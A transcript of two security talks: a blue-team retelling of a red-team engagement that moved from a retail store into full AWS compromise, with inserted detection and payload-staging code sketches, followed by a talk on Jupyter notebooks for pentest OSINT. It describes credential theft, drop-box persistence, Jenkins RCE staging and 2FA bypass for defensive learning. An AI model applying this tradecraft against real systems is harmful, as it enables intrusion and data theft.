host, and we know that this started happening about five minutes ago. So using this basic framework of who, what, where, why, and when, we can start deducing where we are in the actual breach. For me as an investigator, the questions I have are: I know I have a Python backdoor on this box, and I know it likely needed some kind of privilege to run and execute. How did it get that privilege, and how did it get there in the first place? That's what I need to go figure out. And what you can see here highlights my exact questions: we see this a.py payload running on

this box, but we know that once we actually go look at the host, we're going to find some sort of access that happened. And what we noticed was that slightly before this backdoor started running, someone had SSHed into the host. That's significant, because if they were able to SSH in, move a backdoor onto the box, and then execute it, they likely have some kind of admin credential for that specific laptop, and likely for other laptops, or maybe even other machines and servers in that environment, which is a red teamer's dream world early in an engagement: I have credentials that can get me anywhere, let's see where they go. And we think about

that a lot when we're doing blue teaming, because we don't want to just tell the customer, hey, there's a backdoor on this box. We want to make sure we're telling them the whole story, and knowing where we are in the breach lifecycle is the next step to investigating this thoroughly. Now, to take a break from the blue team side of this story, I'm going to talk a little bit about what was actually going on on the red team side. I'll preface this with: we didn't know any of this until the whole thing was over. We actually found it by reading the red

team report, which was shared with us. But I think it's really important to know, and a cool thing to keep in the back of your head, as we go through the rest of this story. Now, this graphic shows a mall. And the red teamers who were making their way into the environment decided that, since they had free rein and the capability to do whatever they wanted to get into this specific environment, they would take a bit of a non-standard approach, which I thought was really cool. What they decided to do was actually go

out to specific retail locations that this company owned and try to socially engineer their way in, doing a survey of ways they could possibly get in at the physical layer, right? So at four or five different retail locations across the globe, they went to the storefront, walked in, pretended to be customers, and started looking around the store for ways they could get onto the network. One of the first things they did was a basic Wi-Fi survey of the environment, and they saw that there was an open guest network. Now, the guest network didn't really get them too far. It was subnetted off, but they were able

to walk around the store long enough to find a back entrance that was attached to one of the dressing rooms they had access to as customers. So, in the red team report, they actually write all of this out, which is hilarious: the red team went and tried on a pair of shorts. They grabbed the shorts off the rack, got an attendant to bring them to the dressing room, and as they came out of the dressing room, they snuck their way into the back entrance of the store, which took them to the quote-unquote back room, the warehouse section of that retail store. And in that store was

a machine that was left unlocked. The red team was able to get onto that machine, while still wearing the bike shorts they had taken into the dressing room to try on, and snoop around a little to see what was on it. One of the things they came across right away, on the desktop of that machine, was an Excel spreadsheet that had credentials in it for a lot of the different employees who access systems in the store. For example, there were POS system logins. There were Wi-Fi passwords for the different networks used between the POS systems, the retail customers, as well

as some of the back-end employees. There were logins for Okta, logins for all kinds of different things that the customer deployed to provide services to that specific store. And what the red team did was simply take a picture of the spreadsheet with their phone, put the shorts back, and walk out of the store. Now, what they decided to do next, which I think is the most interesting part, is they decided to use that store as their persistence. Meaning, they came back to the store armed with all of those credentials, and they built a small computer using a Raspberry Pi and a couple of antennas, with which they created a VPN tunnel over the Wi-Fi network that they now had credentials to.
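
A drop box like the one Tyler describes, a Raspberry Pi quietly joining a store network it was never meant to be on, is something a blue team can hunt for by baselining which devices show up in DHCP or wireless-controller logs. Below is a minimal, hypothetical sketch of that idea, not anything from the talk itself: the lease-record fields and the allowlist are invented for illustration, and the OUI prefixes are the commonly published Raspberry Pi ones (verify them against a current OUI database before relying on them).

```python
# Hedged sketch: flag devices on a store network whose MAC address is not in
# an allowlist, and note any that look like Raspberry Pi hardware by OUI.
# The record schema ("mac", "ip") is hypothetical.

# Commonly published Raspberry Pi OUI prefixes; verify before using.
RASPBERRY_PI_OUIS = {"b8:27:eb", "dc:a6:32"}

def flag_rogue_devices(leases, known_macs):
    """Return a finding for each lease whose MAC is not in the allowlist."""
    findings = []
    for lease in leases:
        mac = lease["mac"].lower()
        if mac in known_macs:
            continue  # expected device, skip
        findings.append({
            "mac": mac,
            "ip": lease["ip"],
            "likely_raspberry_pi": mac[:8] in RASPBERRY_PI_OUIS,
        })
    return findings

# Example with fabricated data: one known POS terminal, one unknown Pi.
leases = [
    {"mac": "AA:BB:CC:00:11:22", "ip": "10.50.1.3"},   # known POS terminal
    {"mac": "B8:27:EB:12:34:56", "ip": "10.50.1.99"},  # unknown, Pi OUI
]
known = {"aa:bb:cc:00:11:22"}
print(flag_rogue_devices(leases, known))
```

The allowlist approach is deliberately dumb: in a retail environment with a stable fleet of POS terminals and handhelds, any MAC you have never seen before is worth a ticket, whether or not the vendor prefix looks like hobbyist hardware.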

So they built this little Raspberry Pi computer, taped it up with a few Wi-Fi antennas, and went to a small gathering place just outside of the store, where they taped the computer, with a large battery, underneath a table, antennas pointing down, to be able to connect to the store's Wi-Fi and then VPN back to a server they were hosting in Linode. That gave them VPN access into that store securely, but also let them persist over time through that store and continue their reconnaissance of that piece of the network. Now, I think that's absolutely ingenious. And one of the things that's even cooler is that that little computer sitting

under the table went unnoticed by anyone in the mall, including security, for two whole weeks, which is insane to me. It was finally discovered and taken down, but it was there forever, and that was how they got in. And we're going to talk about how we pieced that together and figured it out on our own here in a second. Moving away from the red team side of the story, we're going to go back to what was actually happening from a blue team perspective. Now, going back to that lead alert we were looking at, for the Python backdoor that was installed on

that OS X laptop, we started using CrowdStrike pretty extensively to figure out what these guys were trying to do. CrowdStrike is really cool for this kind of stuff, because it gives you a lot of that juicy, low-level detail that we need, specifically process-level detail, to know exactly what they were doing with the backdoor. You can see here I'm including a query that we use very commonly with CrowdStrike, to talk about our investigative process in a little more depth. I'm not going to read it off, but if you want to take a screenshot of it and use it, if you're using CrowdStrike Falcon specifically, this is our favorite way of timelining

a host. Once we've timelined a host, we can understand exactly what happened after that backdoor was executed. Specifically, we're looking for additional commands they're running, to support the theory that this was likely their way in, and now they're doing reconnaissance. What happens next? Now, what I'm expecting, as a blue teamer and someone who's done a lot of investigation into post-compromise activity, is that this laptop wasn't the one they were looking for when they decided to get into the environment. I'm expecting that what they're actually after is somewhere else, and we should expect them to try to discover different hosts and move laterally. So really, what we start to

see is that every time these guys infect a new machine, they're using those credentials they stole off of that laptop for SSH. They install their backdoor, and they dump the OS X keychain using this tool that I've referenced here, and you can go check that out too. It worked really well for them. But the other thing they did, which I thought was rather unique and stood out like a sore thumb when we were doing these investigations, was that they were examining the command-line history of every single box. And through the command-line history of a bunch of these different hosts, they started

getting juicier and juicier data as they moved their way through the environment. You can see in the diagram I have referenced, they were just moving laptop to laptop to laptop to find interesting hosts they could keep stealing more and more data from. Now, eventually, one of the things we found was that they landed on a developer's machine. You might be asking, developers don't normally work in retail stores, right? That doesn't make a whole lot of sense. What we were assuming was that the red team had found a way to move laterally and found a subnet where they were able to

actually get to the headquarters of this specific retail company. For that to happen is pretty significant, because we wouldn't expect this store to be anywhere near the headquarters of this major company. But all we could deduce right now was that these guys were able to do a couple of different things. We knew they had SSH access, we knew they had stolen credentials, and we knew they had ways of moving laterally and performing remote code execution. This is where things start to get really spicy, because they basically have all of the tools to move and to execute, and they have the right level of privilege to keep moving their way through pretty much any environment they're going to come across. Now, you're probably

asking yourself at this point, Tyler, we haven't even talked about the cloud yet. And I get it. This is kind of where we were, too, when we were doing this investigation. We weren't super prepared for what was about to happen next, because at this point we hadn't seen very many, if any, signals leading us to believe that these guys had access to the cloud. What we found out at the end was that, from these retail locations, the red team found a way to move from the retail store to the headquarters to the warehouses and a bunch of other places, because this entire customer was on one flat network. Now, by flat network, I don't mean everything was on the same subnet, but

everything was connected via MPLS VPN, meaning that all of these subnets were routing back to a corporate headquarters, or to a bunch of different locations, in which the attacker could easily identify assets and basically just SSH internally from one place to another. And what we started to see them do was we started to see and track these SSH connections to a bunch of different physical locations around the globe. They were in one retail store here, then they were in another one, then they made it to the headquarters, then they were over here. We watched them go a lot of different places. But eventually, where they landed, like I was talking about before, was a specific development subnet, where they found servers that were

being used to actually push and sustain a lot of the mobile applications that were being used by this customer. Now, one of the tools that this customer used was Jenkins. Jenkins is a very common build-and-deploy utility where a bunch of developers are going to be pushing code, accessing it, and basically pushing builds of new software. Now, what's really interesting about Jenkins is that it's kind of known to have a lot of vulnerabilities. And specifically, the Jenkins instance that these guys came across had one pretty big CVE that allowed RCE over the network. And what you can see here in the second bullet is that this RCE was actually used to pull down

a Java executable that the red team compiled themselves and install it onto the server itself. Now, why is that significant? Well, it's only significant if it gives these guys additional access, and it did, because as soon as they created the payload to run this RCE and pull down their Java executable, they had an Empire backdoor running as a privileged user on a production build server, which is nuts, right? So they found the CVE, they exploited it using one of the hosts internally that they had found and were able to access. And then they were able to pull down their own backdoor, run it on this host, and now they have access to an actual production server inside of the headquarters of this company.
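The staging pattern described here, where an RCE is used to pull down a second-stage executable and run it as a privileged user, can be sketched generically. This is a hypothetical, harmless illustration, not the red team's actual tooling: the "download" is simulated with a local temp file rather than a network fetch, and the "payload" just prints a marker string.

```python
import os
import subprocess
import tempfile


def stage_and_run(payload_source: str) -> str:
    """Write a 'second stage' to disk, execute it, and return its output."""
    # In the real attack this file would arrive over HTTP via the RCE;
    # here we just write it locally to keep the sketch self-contained.
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as f:
        f.write(payload_source)
        path = f.name
    try:
        # Run the staged payload (via sh, so no chmod +x is needed).
        return subprocess.run(["/bin/sh", path], capture_output=True, text=True).stdout
    finally:
        os.unlink(path)  # clean up the dropped file


# A benign stand-in for the compiled Java backdoor.
output = stage_and_run("#!/bin/sh\necho backdoor-simulation\n")
print(output.strip())
```

The point of the sketch is how little machinery the attacker needs once code execution exists: write, execute, clean up.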

Now you can see here, I kind of spelled out how this works. Like I said, they basically are able to manipulate the headers that Jenkins is able to strip over HTTP, pull down the executable, run it, boom, I have command line on this host as if I was a privileged user sitting right in front of the machine. Now, why this matters is because now we're here. And really, we didn't know this in the moment as soon as we saw this happening. But what we started seeing right away after this Jenkins exploit was thrown was we started seeing more AWS alerts. And what started happening was we started seeing not only this attacker starting to try kind of basic reconnaissance style things in AWS, but what

they actually started to do was they started playing with things that we consider more administrative. You can see here, access key creation, SSH key pairs being generated. Those alerts I referenced at the beginning of the presentation, this is where those start flowing in. And what's really interesting is that we didn't really have a good sense of how this was happening because it was coming from an internal host. But what we started seeing, as you can see in this diagram, is that up until April 25th, we didn't really see a lot of admin activity happening with any of these users. But then all of a sudden, these guys had admin level access through the AWS API.
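Triage of this kind of activity can be sketched with plain log filtering. This is a hedged illustration (not Expel's actual detection logic): the event names are real CloudTrail `eventName` values, but the sample records are fabricated for the example.

```python
import json

# CloudTrail event names that correspond to the "administrative" actions
# described above: access key creation, SSH key pair generation, etc.
ADMIN_EVENTS = {"CreateAccessKey", "CreateKeyPair", "CreateUser", "AttachUserPolicy"}


def flag_admin_activity(records_json: str) -> list[str]:
    """Return 'user:event' strings for admin-level API calls in a log batch."""
    records = json.loads(records_json)["Records"]
    return [
        f"{r['userIdentity']['userName']}:{r['eventName']}"
        for r in records
        if r["eventName"] in ADMIN_EVENTS
    ]


# Fabricated sample: one read-only call and two admin-level calls.
sample = json.dumps({"Records": [
    {"eventName": "DescribeInstances", "userIdentity": {"userName": "dev1"}},
    {"eventName": "CreateAccessKey",   "userIdentity": {"userName": "dev1"}},
    {"eventName": "CreateKeyPair",     "userIdentity": {"userName": "builder"}},
]})

print(flag_admin_activity(sample))
# -> ['dev1:CreateAccessKey', 'builder:CreateKeyPair']
```

The read-only `DescribeInstances` call is ignored; only the two privileged actions are flagged, which mirrors the shift in behavior visible on the chart.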

They had privileged access to start creating a lot of the actions that you see at the top half of this chart. So how did this happen? How did these guys get the ability to do this? Well, we knew that the Jenkins server was vulnerable. What we didn't know was how they actually got the creds to do the rest. What they were able to do was use the backdoor they dropped on that Jenkins machine to start enumerating common locations where AWS access keys get stored. And one of the treasures that they hit was a couple of different .boto

files where AWS keys are stored commonly. They were able to actually just read those in plain text, copy and paste out the details, and create their own Boto files on their machines that were located somewhere else to authenticate against the AWS API. So to recap that really quick, they stole credentials from inside the network. They recreated those credentials on their own machines, and then they started authenticating against the AWS API remotely from their own boxes that they had stored completely elsewhere. Now, that's pretty significant because now we've gone through the entire enterprise and we're starting to see these guys use the AWS API from new IOCs. They're using them from those Linode hosts that we

talked about earlier. They're authenticating from other AWS hosts. They're able to now manipulate this same command-line utility the same way that the developers were able to, using their own machines. And that's pretty interesting, because that changes our whole attack surface and starts to create that diagram that we talked about earlier. So once they had this access, what exactly did they start doing? We talked a little bit about the AWS CLI and being able to manipulate the cloud. What exactly does that mean? Well, first and foremost, they started to impersonate users. Now, impersonation in AWS is kind of an interesting thing. It allows me, similar to sudo, to basically take the privileges of another

account that are set up beforehand and use the same abilities that that user has. So I like to think of this as sudo, but they started using it to create their own accounts. So once they started creating their own accounts, we now have more IOCs that we need to track, because we're expecting the attacker to come back and use those in a similar way to their stolen credentials. But with these new accounts, they were actually able to switch roles as well, to be able to access all AWS accounts that the customer owned. So we were in one AWS account that was being used for development. One of

the roles that they were able to get a hold of actually had the ability to read, write, and execute against all of the different AWS accounts that this customer owned. And this is where full cloud compromise starts to happen. Because what they were able to do next was start doing things at a global level. They were actually able to start using that AWS root user to log into the console and make changes as if they were a super admin at this particular customer. Now, a couple of different things that they tried as well, which were rather interesting: they were actually able to take control using the console access

that they had, and using some of the other credentials that they were able to steal from the enterprise, to actually bypass 2FA. And how they did that was they used an Ubuntu exploit on one of the machines, using that administrative user that they had stolen from, to execute a common backdoor that let them get around 2FA and create their own 2FA users. Now, one of the interesting things about that is we also have Duo detections, and we actually saw this being done in real time, where one of the red teamers actually used that exploit to get around 2FA, create their own user, and then

literally register their own cell phone to be able to do the two-factor authentication, which was really, really clever in my opinion. Now, a couple of other things they started to do. Obviously, we know S3 buckets are a big pain point in AWS and a lot of incidents start with them. They were able to read and access about 257 S3 buckets with that access that they stole. And they also started to launch new AWS EC2 instances. Now, that latter part, launching EC2 instances, is a really noisy, kind of boisterous thing to do if you're an actual attacker. But remember, we're in

the red team world. We're talking about things that theoretically can be done, and what an attacker could do if they were actually able to get a hold of your AWS account. And that's what they chose to do to prove that their level of access was actually privileged enough to spin up and use resources without the customer knowing. Now, lastly, and this is probably the most interesting part of what the attacker did in AWS. We're talking about root console access. We're talking about the keys to the kingdom. The attackers realized that they had gotten really far, but they hadn't really exfilled any information yet. They hadn't really gotten to the part where an attacker who

is literally trying to target this company would have gone and stolen customer data or PII. This is the part where they did that. And I thought this was ingenious. What they decided to do was take a snapshot of the virtual disk of that particular machine that they found a Postgres database on. Since they couldn't get in and the credentials weren't valid, they figured they could take this to the administrative layer, the EC2 layer, and abuse some of the tools there to copy that hard drive, download it, take it offline, and actually throw it against one of their cracking utilities to brute-force the password to

that machine. And sure enough, they actually got one of the passwords using a pretty intense brute-forcing rig that they had access to, and they were able to crack it offline and access all of the secrets that were in that database. This is kind of mind-blowing to me, because this is the stuff that's going to defeat GuardDuty. This is going to defeat CloudTrail. This is going to basically render the trail cold in terms of things that we can detect in the cloud, but it was probably the most fruitful access the attacker actually got, the thing they were really able to abuse in the AWS console to

be able to benefit from it, which is really interesting. And like I've said a few times now, like at this point in time, from going from the enterprise, from that dressing room, from being able to get to that laptop that was unlocked with all the passwords on it, to being able to SSH their way through the environment, eventually making their way into the cloud, the attackers had control of everything in AWS. Any action that you can perform via the API or in the console itself, they had the ability to do. And these were the things that they chose to teach us in terms of what they had access to. You might be wondering at this

point, like, okay, cool, Tyler. You saw all this stuff happening. What did you actually do about it? Right? Because we're supposed to be protecting this client. Within 15 minutes of the attacker breaking into the retail store, we were able to quarantine the machine that the attacker had their initial foothold on. And this cut off the attacker's initial access, which we obviously didn't know was a red team at the time, but it subsequently stopped the entire engagement. And for the sake of this engagement, the red team actually called the customer and said, hey, we just had our access cut off. This was us. Could you please let us back in? And obviously, for the sake

of learning and for the sake of letting this engagement play through, we unquarantined that machine and let the red team go to see what they would do. And that's kind of the real big takeaway from this: when we're doing red team response, when we're acting as a blue team while there's an active red team in the environment, it's not about red versus blue. It's not about who can detect who, and it's not about who can get by who. It's about working together to protect the organization and find security holes that previously were unknown. And that's where we want to play. We want to play in that purple team model

of learning and getting better. Now, a big takeaway for us is that enterprise security woes can lead to cloud security woes. Specifically, network segregation and AWS credential access were big players here in how far the attacker could get. Now, I'm not saying that the red team wouldn't have found another way in, whether by phishing their way in or going to another retail store. But that original unlocked laptop got them pretty far. And that's a pretty simple thing to fix with GPO and a bunch of other tools that allow you to manage assets. But really

kind of where we thrived, and where we learned a ton, was getting really comfortable with the alerting that AWS gives you out of the box, and that's through AWS GuardDuty. And you'll see here, I have a QR code. I promise this isn't malicious. It's going to take you to the blog post that we wrote after this about making sense of AWS GuardDuty alerts. These are some of the things that we found success with, some of the high-fidelity signals that we look at and triage every single day. But really, what I want to give a final hurrah to was actually the red

team that made this possible. I can't say their name for confidentiality purposes. But this is really, in my opinion, what a great red team engagement looks like. They had free rein to do whatever they wanted. They had physical and virtual access, meaning we're not just testing what's vulnerable from the internet's perspective, but we're also testing the ability of the employees to spot threats, and some of the actual physical controls that were implemented in this environment to prevent these guys from getting in, which was really cool. And I've talked about this a few times, the collaboration between red and blue team. We had an open line to the red team. They had an

open line to us. We could easily identify when stuff was red team and confirm with them that it was something they were doing, so we knew there wasn't a critical incident we needed to chase elsewhere in the environment, which was really nice from a blue team perspective. And lastly, mostly native tooling. Why this is important is because native tooling is what makes detection hard. We talk about prevalence and things that are commonly seen in environments, you know, PowerShell, Bash, command-line utilities. A lot of that stuff makes detection really hard, because all applications use these tools and do really interesting and sometimes seemingly malicious things that we have to weed out. This red team did a really

good job of sticking to a lot of that tooling and abusing things that are commonly seen in this environment to blend in, make us work, and strengthen our detection, which was really cool to see as the engagement played out. That's it for this story, and that's it for the things I want you to take away from this talk. Again, a great red versus blue team engagement. Use some of this when you're thinking about doing your own red team engagement, or if you're a blue teamer and you're looking to learn about AWS, please go take a look at our blog post. Please reach out. You can reach me at any of

these contacts and definitely take a look at expel.io in terms of our blog to just kind of look, see some of the things that we're seeing and learn from some of the interesting things and some of the mistakes that we've made along the way. We're very open about them. Thanks again. My name is Tyler. Have a good one.

Hey everybody, welcome to our talk, A Drop of Jupyter, where we're going to show you how to use Jupyter Notebooks for a more modular and dynamic approach to penetration testing. Shout out to anybody that can get the reference. There's a hint right above the Jupyter logo. If you get it, drop something in the chat. So here's a quick overview of our team. On the next few slides, we'll go into a bit more detail on who we are and what we do. So who am I? I am a security consultant at Protiviti. I focus on NetPen primarily, but I also do OSINT and tooling research, as well as operating as an amateur tool developer. So I've made some stuff that's gained some traction

in the bug bounty community, which I'll talk a little bit more about later on in the presentation. But mostly, again, really happy to be here, and shout out to the folks at B-Sides for giving us this opportunity. I'm going to introduce one of our partners in this, Cody, first. Cody is a consultant at Protiviti. He likes to refer to himself as a jack-of-all-trades pen tester. He helps us with quite a bit of everything, a little bit of web app, a little bit of NetPen, and he also specializes in mobile application testing. And he also prefers to automate report writing. Who am I? I am Nate Kirk. I am a senior security consultant at Protiviti. I specialize in network penetration testing and red teaming. I am also the infrastructure and

tooling lead for the Protiviti attack and pen practice. I've actually worked with Omar on integrating this into our infrastructure and our day-to-day, and we'll talk later on about how you can do it too. I am also a former sysadmin and blue teamer. So just a quick refresher, whether you are familiar with Jupyter or have no idea what it is: Jupyter is a non-profit, open-source project that grew out of IPython, an interactive command-line shell for Python. Historically, Jupyter has been primarily used for data science, but what we're trying to do is pivot that and show you the applications it can have for penetration testing specifically. Quick overview again of some of the functionality and what it is.

It is a platform where you can have parallel documentation and execution at the same time. It is a simple and collaborative file repository. So imagine combining your OneNote notebook of commands, scripts, et cetera, while also being able to execute them at the same time. There's no more copying, pasting, or referring back to your past history. You have everything in one place for your documentation and execution. Additionally, there are data manipulation and reporting abilities. For example, if you want to integrate matplotlib or any other libraries, or if you want to use an R kernel for your statistics or for developing reporting metrics, that functionality is also there. It's also accessible via a browser, which we'll touch upon more

in the coming presentation. But before that, I wanted to quickly give a brief overview of why Jupyter. So the idea for creating a Jupyter notebook stemmed from when I was starting out as a junior penetration tester. I found myself constantly flipping through notes, writing long bash scripts, and trying to get things done where I really didn't have the knowledge and the know-how. I felt like this wasn't an ideal learning environment for new testers that were coming in, either. So we came up with the idea to create a Jupyter notebook that had the commands and the documentation for newer testers, and for current testers to automate and be able to standardize their

methodology. So Jupyter, in a nutshell, again, it's a simple and easy to use platform. It's a better method to facilitate the training and project execution of an assessment at the same time. It provides a collaborative environment as well as management oversight. And there's currently a large opportunity for involvement with penetration testing activities and changing things so that it's not just used as a data science framework, but more so as an offensive security framework in the future.

So how does Jupyter work? Jupyter has an active kernel, which enables continuous testing. The kernel we're using for our demonstration is a Python kernel, but there are over 100 kernels that you can use. So you could change your kernel to Ruby, to Go, to JavaScript. There are a lot of possibilities, and that contributes to the extensibility of Jupyter itself. Code and markdown are inputted in a modular format: code goes into cells, markdown goes into cells, and those cells can be interchanged throughout the Jupyter Notebook for more modular testing. It operates off of a server-client infrastructure that Nate will touch on later in the presentation. And one of the

coolest things, I think, is the combination of code that you can use. So for example, you can combine Python and Bash together to create really modular scripts, strong and powerful complex functions. And it really opens up a wider array of possibilities for penetration testing, especially when you have a Jupyter instance running on your Kali machine.

So I'm going to try to go over a quick few examples of some of the highlights that I mentioned. So for example, with code and markdown, you can see this is a very brief and stripped down, I guess, overview or demo of what a notebook could look like. So you can see at the very top, it says, this notebook introduces some Python concepts. So that's an example of a markdown cell. Beneath that, there's some Python code, where you'll see print hello world, and you'll see some numeric functions happening, and you'll also see the output. But Jupyter operates within these cells, so you'll have a cell of markdown, you'll have a cell of code, and those are typically the two main cells for functionality in a Jupyter notebook.
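For reference, the on-disk format behind those cells is plain JSON: a notebook is a list of cells, each tagged as markdown or code. A minimal hand-written fragment (nbformat 4; contents are illustrative, mirroring the demo slide) might look like this:

```json
{
  "nbformat": 4,
  "nbformat_minor": 5,
  "metadata": {"kernelspec": {"name": "python3", "display_name": "Python 3"}},
  "cells": [
    {"cell_type": "markdown", "metadata": {},
     "source": ["This notebook introduces some Python concepts."]},
    {"cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [],
     "source": ["print('hello world')"]}
  ]
}
```

Because it is just JSON, notebooks diff, version, and share like any other text file, which is part of what makes the collaborative workflow possible.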

Here's a quick example that, again, Nate will touch on a lot more. I just wanted to show you guys what the server-client infrastructure looks like. So currently, I have a Jupyter notebook running on my Kali machine, serving it up, and I access it via a web browser using HTTPS and a port that I specified. You can also set a password, which I would strongly recommend, especially if you're working in teams or if you have sensitive data inside of your Jupyter Notebook.
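One way to wire up that HTTPS-plus-password setup (a hedged sketch, assuming the classic notebook server; the cert/key paths are made-up examples, and newer Jupyter Server installs use `c.ServerApp.*` option names instead) is through the config file:

```python
# ~/.jupyter/jupyter_notebook_config.py -- config fragment, not a standalone script.
c.NotebookApp.certfile = "/home/kali/mycert.pem"  # serve the notebook over HTTPS
c.NotebookApp.keyfile = "/home/kali/mykey.key"
c.NotebookApp.port = 8443                         # the port you specify
# Set a hashed login password first by running: jupyter notebook password
```

With that in place, the browser connects over HTTPS on the chosen port and prompts for the password before exposing the file repository.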

To reiterate what I was talking about with combining Python and other code, this is a quick example of how Python and Bash can interact inside of a Jupyter Notebook. You'll see that there is a mix of both Python and Bash scripting. As you can see, I've created a list variable in Python, and that list contains six strings. In the next two lines of code, I've used a loop to iterate across that list. And instead of using a Python print statement, I'm passing the variable i, set in Python, to Bash, and using a Bash command to echo the output to the Jupyter Notebook. So this is a very simplified version of what you

can do, but I hope that it illustrates at least the possibilities that are available while using a Jupyter Notebook for penetration testing.
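A reconstructed sketch of the cell just described: inside a notebook, the Bash call would be a `!echo {i}` line magic in the loop body; outside a notebook, the stdlib `subprocess` equivalent looks like this (the list contents are made up for illustration).

```python
import subprocess

# A Python list of six strings, as in the demo cell.
hosts = ["web01", "web02", "db01", "db02", "mail01", "vpn01"]

collected = []
for i in hosts:
    # In a Jupyter cell, this line would simply be:  !echo {i}
    # Here we call echo through subprocess to the same effect.
    out = subprocess.run(["echo", i], capture_output=True, text=True).stdout.strip()
    collected.append(out)
    print(out)
```

The interesting part is the hand-off: a value defined in Python is consumed by a shell command, and the shell's output lands back where Python (and the notebook) can capture it.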

So here are some key issues that we've noticed, and the reasons why we wanted to create a Jupyter notebook for performing penetration testing related activities. Current frameworks, such as the PenTesters Framework, or whatever methodology you might be using (maybe you have everything just dropped into a simple bash script), lack the extensibility, the modular nature, the documentation, the markdown, and the collaborative nature that Jupyter Notebook provides for teams. What Jupyter does better than other frameworks: it has a specific set of documentation, magic commands, and notebook extensions, and it's very easy to use. There's a GUI, so it's not something that's necessarily complex or difficult to start off with for newer penetration

testers or penetration testers with more skin in the game. And like I mentioned before, it's collaborative in nature. Through the file explorer, anybody can download a file, upload a file, or edit a file, as well as the Jupyter Notebook itself. And some of the issues stem from the current environment in which penetration testing activities are conducted: there is a constantly changing landscape of new tools and methodologies. This makes it difficult to constantly update frameworks, and difficult to share those framework updates, tools, or anything new that's popping up in the community. As a result, we see that there's a lack of a truly collaborative and modular framework for pentesting itself.

Combined with a lack of standardized methodology within teams, there's also a resultant documentation sprawl, especially for newer pen testers, which makes it really hard to hop in the game: a sprawl of commands, scripts, and notes that are usually just littered everywhere. Having a centralized repository really helps with that, and it starts to reduce another issue, which is the barrier to entry for newer testers.

So our solution is relatively simple. I hope that you all have guessed it by now. We want to utilize Jupyter Notebooks to develop modular and standardized automation frameworks for the execution and documentation of core penetration testing activities. To illustrate that, we'll go into a demo of an OSINT notebook that we've created. It's a bit of a stripped-down version of what we use in the lab itself, but nonetheless it's a good demonstration of the functionality that you can leverage with Jupyter to perform key activities.

So here's a quick overview of what we're going to be covering and the functionality the Jupyter Notebook will provide. There will be subdomain enumeration, email enumeration, and vendor service enumeration. There will also be some additional functionality in the Jupyter Notebook that we will work through live. After some of the data is gathered, there will be some formatting, verification of whether a domain is alive or not, and then ultimately, at the end, parsing everything into a deliverable that management can look at (thanks to the collaborative nature of Jupyter) or that anybody can pull down. And so we'll go ahead and start the demo.

Okay, and just to give a quick overview of how Jupyter is structured, and to make some of the stuff I was talking about sound more practical: Jupyter, like I mentioned, has a file repository. Within this file repository, I've created a folder called demo, and you can see and view all the running Jupyter notebooks, including some of my personal ones that I use for testing or for bug bounty or things of that nature. And there are also, like I mentioned, extensions that you can use to change how your code is displayed, reporting features, and so on. There's a lot more than what's being displayed right now; there's a lot of functionality that you can add with these extensions,

but for now we'll try to keep it as basic as possible. So moving on into the Jupyter Notebook itself, I'm going to walk through some of the additional functionality that I mentioned. Jupyter has a File tab. You can open notebooks, and you can check the version history if you're using it for collaborative reasons, to see how the notebooks change, similar to Google Drive or something of that nature. You can download the notebook, and there's additional functionality within the cell-running functions. So again, like I mentioned, you have code cells, like the start-time cell you can see here, where I've imported datetime and printed the date and time

as a start time. And again, some of the data right here is not accurate, but I'll clear it, and then hopefully that'll give you all a better idea of how the Jupyter Notebook runs. So I'm going to go ahead and clear all the output. Now you'll see no output coming from these tools. As you can see, I have some markdown and then some code cells. In one of the cells, there is a setup script, or a few cells of setup, that are run during the Jupyter OSINT notebook. So for example, in this cell right here, I'm setting all my variables to be passed. In Python, I'm saying that the domain is protiviti.com, I'm saying that the client is

Protiviti, and I'm creating a folder name called demo to store all the outputs from the notebook. And here again is an example of a combination of Bash and Python scripting, like I mentioned before, where I'm performing a host lookup on the Python domain variable, except I'm doing it in Bash, and then I'm taking the output from that Bash command, the IP address, and storing it back into a Python variable. I hope that illustrates the dynamic nature of code within Jupyter. So I'm going to go ahead and run this cell block. This is relatively easy, and I've already created the folder, so you'll see an output that says the folder cannot be created, which is totally fine. And

then I'm going to print out all the variables that I just set, so I can show you all how it works. Now you can see that the client name has been set to Protiviti, and so on and so forth. Another core portion of the setup script is the tool initialization script, which we don't have to go into in too much detail. Again, it's relatively straightforward. Essentially, all it's doing is trying to create a modular way for me to reference tools in the notebook. So for example, instead of specifying the whole path of a common tool used in OSINT, like Subfinder or Sublist3r, it will just perform a locate and then store that path into a dictionary so I can reference it throughout the notebook. And so I'm

going to go ahead and run this script to initialize all the tools that I'm going to use in the notebook. And you should start to see some output. So you'll see that all these paths have now been set into a dictionary.
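That tool-initialization idea can be reconstructed in a few lines. This is a hedged sketch, not the demo's actual script: it uses `shutil.which` to resolve each tool on PATH instead of `locate`, and the tool names below are stand-ins (on a Kali box you'd list subfinder, sublist3r, assetfinder, and so on).

```python
import shutil

# Stand-in tool names; substitute your actual OSINT tooling here.
TOOL_NAMES = ["sh", "ls"]

# Resolve each tool's full path once and keep it in a dictionary,
# so cells elsewhere in the notebook can reference tools[name].
tools = {name: shutil.which(name) for name in TOOL_NAMES}

for name, path in tools.items():
    print(f"{name}: {path}")
```

Centralizing the paths in one dictionary is what keeps the rest of the notebook modular: a cell invokes `tools["subfinder"]` rather than hard-coding an install location.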

Going back to the overview that I showed, one of the first things I wanted to show is our subdomain enumeration process. Again, this is a bit stripped down because of time constraints and the nature of the demo. So I wanted to show you guys what a standard tool like Subfinder looks like being run inside of a Jupyter Notebook. The command is already written in there, so if I'm a new tester and I've never run Subfinder before, I can read the markdown description of what it does, and all I have to do is click Run inside of the cell block, and it'll start to enumerate

the subdomains for me inside of the notebook itself. So it mitigates the need to really understand terminal commands in general. Of course, that's something that's important, but for training and automation purposes, this can be really useful during assessments. So Subfinder will run, and once it's completed, the next tool will run. The next tool is called Assetfinder; it's written by tomnomnom. Similar to Subfinder, it performs the same function, but typically when doing OSINT, you want to spread your landscape a bit and use multiple tools to get as many subdomains as you can. So I'm going to go ahead and run Assetfinder. Now that's going to run, and similarly to

Subfinder, you'll see the output coming out in real time in your notebook. Now, one thing I do want to show is that I'm performing a tee in Bash to store all these domains as a separate file alongside the notebook. So I can go to my folder, or anybody from my team can go to my folder, and they can go into the B-Sides demo folder. Some of these have already been run, but they'll rerun and overwrite as we go through the demo. This domains.csv, you can see it was just modified seconds ago; it's the one that we just ran. So I can go into it and see all the subdomains from Assetfinder and Subfinder outputted together.

I can edit this, I can send it off to somebody, anybody can pull it down. So this really shows the collaborative nature of Jupyter itself.

